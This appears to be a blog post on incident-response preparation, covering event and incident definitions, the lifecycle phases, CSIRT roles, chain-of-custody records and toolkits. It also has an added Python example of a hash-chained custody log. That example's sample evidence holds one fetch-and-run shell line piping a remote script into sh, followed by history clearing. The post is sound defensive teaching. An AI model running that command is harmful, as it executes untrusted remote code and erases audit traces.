A look into the Preparation phase of Incident Response

Saniye Nur
8 min read · Sep 10


In incident response terminology, an event is any observable occurrence within a system or network: something that is noticed, recorded, or detected, such as a user logging in, a firewall dropping a packet, or a server raising an error. Events are documented for many purposes, including monitoring, analysis, troubleshooting, and evaluation, and the vast majority of them are entirely benign.

In various contexts, observed occurrences can include:

  1. System Events: These are events that happen within a computer or software system, such as the execution of a program, the generation of log entries, or the occurrence of errors.
  2. Security Incidents: In cybersecurity, observed occurrences might refer to suspicious activities or breaches that are detected within a network or information system.
  3. Environmental Observations: In scientific or environmental monitoring, observed occurrences could involve tracking changes in natural systems, such as wildlife behavior, weather patterns, or environmental conditions.
  4. Business Operations: In a business context, observed occurrences could pertain to various business processes, such as sales, customer interactions, inventory changes, and more.
  5. Quality Control: In manufacturing or industrial settings, observed occurrences could be related to product defects, process deviations, or quality control checks.

The term “observed occurrence” is somewhat generic and can be used in different fields and contexts to describe something that has been witnessed, recorded, or detected within a given system or environment. The specific meaning and significance of an observed occurrence will depend on the context in which it is used and the goals or objectives of the observation.

An incident, by contrast, is a violation or imminent threat of violation of security policies, acceptable use policies, or standard security practices: any action, behavior, or event that goes against the rules an organization has established. Such violations can compromise the confidentiality, integrity, or availability of sensitive information, assets, or resources. Security policy violations can take various forms, including:

  1. Unauthorized Access: Gaining access to systems, networks, or data without proper authorization, such as using someone else’s login credentials or exploiting vulnerabilities to bypass security controls.
  2. Data Breaches: Unauthorized exposure, theft, or disclosure of sensitive or confidential data, such as customer information, financial records, or intellectual property.
  3. Malware Infections: Installing or executing malicious software (malware) on a system, which can include viruses, Trojans, ransomware, or spyware.
  4. Phishing Attacks: Falling victim to phishing emails or social engineering tactics that trick individuals into revealing sensitive information like passwords or financial details.
  5. Policy Violations: Actions that directly violate established security policies, such as connecting unauthorized devices to a network, sharing login
  6. Weak Passwords: Using easily guessable or weak passwords that do not meet security policy requirements, making systems vulnerable to brute-force attacks.
  7. Neglecting Updates: Failing to apply security patches and updates promptly, leaving systems vulnerable to known vulnerabilities.
  8. Improper Data Handling: Mishandling sensitive data, such as leaving documents in an unsecured location, sending confidential information over unencrypted channels, or failing to securely dispose of physical or digital records.
  9. Unauthorized Configuration Changes: Modifying system configurations or security settings without proper authorization, potentially introducing security weaknesses.
  10. Insider Threats: Actions taken by employees, contractors, or other trusted individuals with access to an organization’s systems and data that are contrary to security policies or malicious in intent.

Security policy violations are a significant concern for organizations because they can lead to security breaches, financial losses, legal consequences, and damage to an organization’s reputation. Establishing and enforcing robust security policies and practices, along with employee training and awareness programs, are essential steps in mitigating the risk of security policy violations.

Organizations lay down their incident response procedures during the “Preparation” phase of the incident response lifecycle. The six-phase lifecycle below is the model popularized by SANS (NIST SP 800-61 groups the same activities into four phases), and each phase plays a crucial role in responding to and managing security incidents:

  1. Preparation: In this phase, organizations develop and document their incident response procedures, policies, and plans. They establish incident response teams, define roles and responsibilities, acquire necessary tools and resources, and conduct training and awareness programs. The goal is to be well-prepared to handle incidents when they occur.
  2. Identification: During this phase, organizations detect and identify potential security incidents. This may involve monitoring network traffic, analyzing logs, using intrusion detection systems, or receiving reports from users or automated alerting systems.
  3. Containment: Once an incident is confirmed, the containment phase aims to limit the scope and impact of the incident. Organizations take immediate actions to isolate affected systems, block malicious activity, and prevent further compromise.
  4. Eradication: In this phase, organizations work to eliminate the root cause of the incident. This may involve patching vulnerabilities, removing malware, and ensuring that the attacker no longer has access to the compromised systems.
  5. Recovery: After eradicating the incident, the recovery phase focuses on restoring affected systems and services to normal operation. Organizations ensure that data is restored, systems are tested, and operations can resume.
  6. Lessons Learned (Post-Incident Analysis): In the final phase, organizations conduct a post-incident analysis to evaluate their response to the incident. They identify weaknesses, areas for improvement, and lessons learned. This information is used to update incident response procedures and enhance security measures.

The “Preparation” phase is critical because it lays the foundation for an effective incident response program. It ensures that organizations have well-defined procedures in place, personnel are trained, and the necessary resources are available to respond promptly and effectively to security incidents when they occur. Without proper preparation, the effectiveness of the response to security incidents can be compromised.

An organization resumes full business operations during the “Recovery” phase, but it updates its response capabilities in the “Lessons Learned” phase that follows. The two are easy to conflate because improvements identified after an incident often start being implemented while systems are still being restored:

  1. Resuming Business Operations: During the “Recovery” phase, the organization restores affected systems, services, and processes to their pre-incident state or an acceptable operational level. This includes verifying that critical systems function properly, that data has been restored from known-good backups, that rebuilt systems are patched and monitored more closely than usual for signs of reinfection, and that any temporary workarounds put in place during containment are removed. The goal is to minimize downtime and resume normal business operations as swiftly as it is safe to do so.
  2. Updating Response Capabilities: In the “Lessons Learned” phase the organization reviews how the incident was handled and identifies gaps in its incident response capabilities. Typical outcomes are revised incident response plans, enhanced security controls, additional training for incident responders, and new or upgraded tools. Some of these changes (for example, hardening a rebuilt server or tightening a firewall rule) are applied during Recovery, but the formal review and the update of plans and procedures belong to Lessons Learned, which feeds back into Preparation for the next incident.

A group that handles events involving cybersecurity breaches, comprising individuals with different skills and expertise, is typically known as a “Computer Security Incident Response Team” or “CSIRT.” CSIRTs play a crucial role in an organization’s cybersecurity posture by responding to and managing security incidents, including cyberattacks, breaches, and vulnerabilities.

A CSIRT is a dedicated team that may consist of security analysts, incident responders, forensic experts, network administrators, legal advisors, and other professionals with diverse skills and knowledge related to cybersecurity. The team’s responsibilities often include:

  1. Incident Detection: Monitoring networks and systems for signs of security incidents.
  2. Incident Analysis: Investigating and analyzing security events to determine the scope, impact, and root cause of incidents.
  3. Incident Containment: Taking immediate actions to limit the spread of the incident and prevent further damage.
  4. Incident Eradication: Identifying and eliminating the source of the incident, such as malware or vulnerabilities.
  5. Recovery: Restoring affected systems and services to normal operation.
  6. Communication: Providing timely and accurate communication to stakeholders, including management, employees, customers, and law enforcement if necessary.
  7. Forensics: Collecting and preserving digital evidence for legal and investigative purposes.
  8. Post-Incident Analysis: Conducting lessons learned and post-incident reviews to improve incident response procedures and security measures.

CSIRTs can vary in size and structure, depending on the organization’s size and security needs. They are an essential component of an organization’s cybersecurity strategy and help ensure a coordinated and effective response to security incidents.

The documents used to accompany evidence collected and keep track of who handles the investigation procedures typically include:

  1. Chain of Custody Form or Log: This document records the chronological history of the physical or digital evidence, including who collected it, when, and from where. It also documents who had custody of the evidence at each stage of the investigation. For digital evidence, each entry should also record a cryptographic hash (typically SHA-256) of the item, taken at collection and re-checked at every hand-over, so that any later handler can demonstrate the evidence has not changed.
  2. Evidence Labels or Tags: Physical evidence may be labeled or tagged with unique identifiers that correspond to entries in the chain of custody log. These labels help ensure that evidence is properly tracked and identified.
  3. Evidence Handling Procedures: These are written guidelines or standard operating procedures (SOPs) that detail how evidence should be collected, preserved, stored, and transported. They may also specify who is responsible for each step of the process.
  4. Incident Report or Case File: This document provides an overview of the incident, including details such as date, time, location, parties involved, and a description of the evidence collected. It may also include initial findings or observations.
  5. Forensic Examination Reports: For digital evidence, detailed reports of the forensic examination should be generated. These reports document the methods used, the findings, and any conclusions drawn from the analysis.
  6. Photographs or Video Recordings: Visual documentation of the evidence can provide important context and help establish its integrity. This is particularly important for physical evidence.
  7. Witness Statements: Statements from individuals who were present or involved in the incident may be collected to provide additional context or corroborate evidence.
  8. Legal Documentation: Depending on the nature of the investigation, legal documents such as search warrants, subpoenas, or court orders may be part of the accompanying documentation.
  9. Evidence Packaging: The packaging used to store and transport physical evidence should be labeled and sealed to prevent tampering.
  10. Access Logs or Records: Digital evidence may be accompanied by access logs or records indicating who accessed the evidence, when, and for what purpose.

Maintaining accurate and well-documented records is crucial for preserving the integrity of evidence and ensuring that the investigation procedures adhere to legal and procedural standards. It also helps establish the credibility and reliability of the investigation process.
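The following is an added example, not code from the original article, showing how the chain-of-custody form and the access log described above can be kept as one tamper-evident record for a piece of digital evidence. Every entry stores the SHA-256 of the evidence as it is handed over, and each entry also commits to the digest of the previous entry, so an interior row cannot be altered, reordered, or dropped without breaking the chain. The evidence identifier, handler names, timestamps, and the evidence bytes are all constructed for illustration; the hash-chain layout is a design choice of this example, not a standard form.

```python
# Added example (not from the original article): a minimal, tamper-evident
# chain-of-custody log for one item of digital evidence. Names, timestamps and
# the evidence content below are constructed for illustration.
import hashlib
import json
from dataclasses import dataclass, asdict
from typing import List


def sha256_hex(data: bytes) -> str:
    """SHA-256 of the evidence bytes; this is what goes on the label and in the log."""
    return hashlib.sha256(data).hexdigest()


@dataclass(frozen=True)
class CustodyEntry:
    """One row of the chain-of-custody form."""
    seq: int
    action: str            # collected / transferred / accessed / verified
    handler: str           # person holding the evidence after this action
    timestamp: str         # UTC, ISO 8601, as written on the form
    evidence_hash: str     # SHA-256 of the evidence at the time of this entry
    prev_entry_hash: str   # digest of the previous row, linking the rows into a chain
    note: str = ""

    def digest(self) -> str:
        """Digest of the whole row; the next row commits to this value."""
        return sha256_hex(json.dumps(asdict(self), sort_keys=True).encode())


class ChainOfCustody:
    GENESIS = "0" * 64  # prev_entry_hash of the first row

    def __init__(self, evidence_id: str, description: str, content: bytes,
                 collector: str, when: str, note: str = ""):
        self.evidence_id = evidence_id
        self.description = description
        self.original_hash = sha256_hex(content)  # reference hash taken at collection
        self.entries: List[CustodyEntry] = []
        self._append("collected", collector, content, when, note)

    def _append(self, action: str, handler: str, content: bytes,
                when: str, note: str) -> CustodyEntry:
        prev = self.entries[-1].digest() if self.entries else self.GENESIS
        entry = CustodyEntry(len(self.entries), action, handler, when,
                             sha256_hex(content), prev, note)
        self.entries.append(entry)
        return entry

    def record(self, action: str, handler: str, content: bytes,
               when: str, note: str = "") -> bool:
        """Log a handling step and re-hash the evidence as it is handed over.

        Returns True if the evidence still matches the hash taken at collection.
        A mismatch is still logged (the form must show what happened), but the
        caller should treat the item as compromised and escalate.
        """
        entry = self._append(action, handler, content, when, note)
        return entry.evidence_hash == self.original_hash

    def verify_log(self) -> bool:
        """Re-walk the hash chain. Any edited, reordered or removed interior row
        breaks a link. Removing rows from the *end* is not detectable from the
        chain alone, which is why the latest digest should also be recorded
        externally (e.g. countersigned on the paper form or in the case file)."""
        prev = self.GENESIS
        for i, entry in enumerate(self.entries):
            if entry.seq != i or entry.prev_entry_hash != prev:
                return False
            prev = entry.digest()
        return True

    def latest_digest(self) -> str:
        return self.entries[-1].digest()

    def to_json(self) -> str:
        """Serialize the form for inclusion in the case file."""
        return json.dumps({"evidence_id": self.evidence_id,
                           "description": self.description,
                           "original_hash": self.original_hash,
                           "entries": [asdict(e) for e in self.entries]},
                          indent=2)


# Constructed sample evidence: a fragment of shell history from a compromised host.
EVIDENCE = b"curl -s http://203.0.113.7/x.sh | sh\nhistory -c\n"


def build_example_log() -> ChainOfCustody:
    log = ChainOfCustody("EV-0001", "bash history, host web01 (constructed)",
                         EVIDENCE, "A. Analyst", "2023-09-10T08:00:00Z",
                         "imaged via write-blocker, sealed in bag #12")
    log.record("transferred", "B. Examiner", EVIDENCE, "2023-09-10T09:30:00Z",
               "seal intact on receipt")
    return log


if __name__ == "__main__":
    log = build_example_log()
    print(log.to_json())
    print("chain valid:", log.verify_log())
    # A later handler produces bytes that differ from what was collected:
    print("still intact:", log.record("accessed", "C. Contractor", EVIDENCE + b"#",
                                      "2023-09-10T11:00:00Z"))
```

The chain only protects the interior of the log: truncating the newest rows leaves a valid but shorter chain, so the value of `latest_digest()` should be written on the physical form or countersigned in the case file at each hand-over, which is the digital equivalent of the sealed, labeled evidence bag.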

A kit containing the necessary incident-handling tools and resources is often referred to as an “Incident Response Toolkit” or “Incident Handling Kit.” This kit typically includes various tools, software, documentation, and resources that an incident response team or cybersecurity professionals might need to effectively respond to and manage security incidents.

The contents of an incident response toolkit can vary depending on the organization’s needs and the types of incidents it may encounter. Common items found in such a toolkit may include:

  1. Forensic Tools: Software and hardware tools for collecting, analyzing, and preserving digital evidence, such as disk imaging software, memory analysis tools, and write-blockers.
  2. Network Monitoring and Analysis Tools: Tools for monitoring network traffic, analyzing logs, and identifying suspicious or malicious activity.
  3. Malware Analysis Tools: Software and sandboxes for examining and analyzing malicious software (malware) samples.
  4. Security Information and Event Management (SIEM) Systems: SIEM platforms that help collect, correlate, and analyze security event data from various sources.
  5. Documentation Templates: Incident response plans, checklists, and templates for documenting incident details, actions taken, and lessons learned.
  6. Communication Tools: Secure communication tools and templates for notifying stakeholders, including management, law enforcement, and affected parties.
  7. Digital Forensic Resources: Reference materials, guides, and documentation on digital forensics and incident response best practices.
  8. Legal and Compliance Resources: Legal and compliance documentation, including contact information for legal counsel and regulatory authorities.
  9. Backup and Recovery Tools: Tools and procedures for data backup and recovery in case of data loss during an incident.
  10. Hardware and Accessories: Hardware components such as external hard drives, write-once media, and evidence bags for physical evidence handling.
  11. Training Materials: Educational materials and training resources for incident response team members.

The Incident Response Toolkit is a critical resource for organizations to ensure they are well-prepared to handle security incidents promptly and effectively. It helps streamline the incident response process and ensures that the necessary tools and documentation are readily available when needed.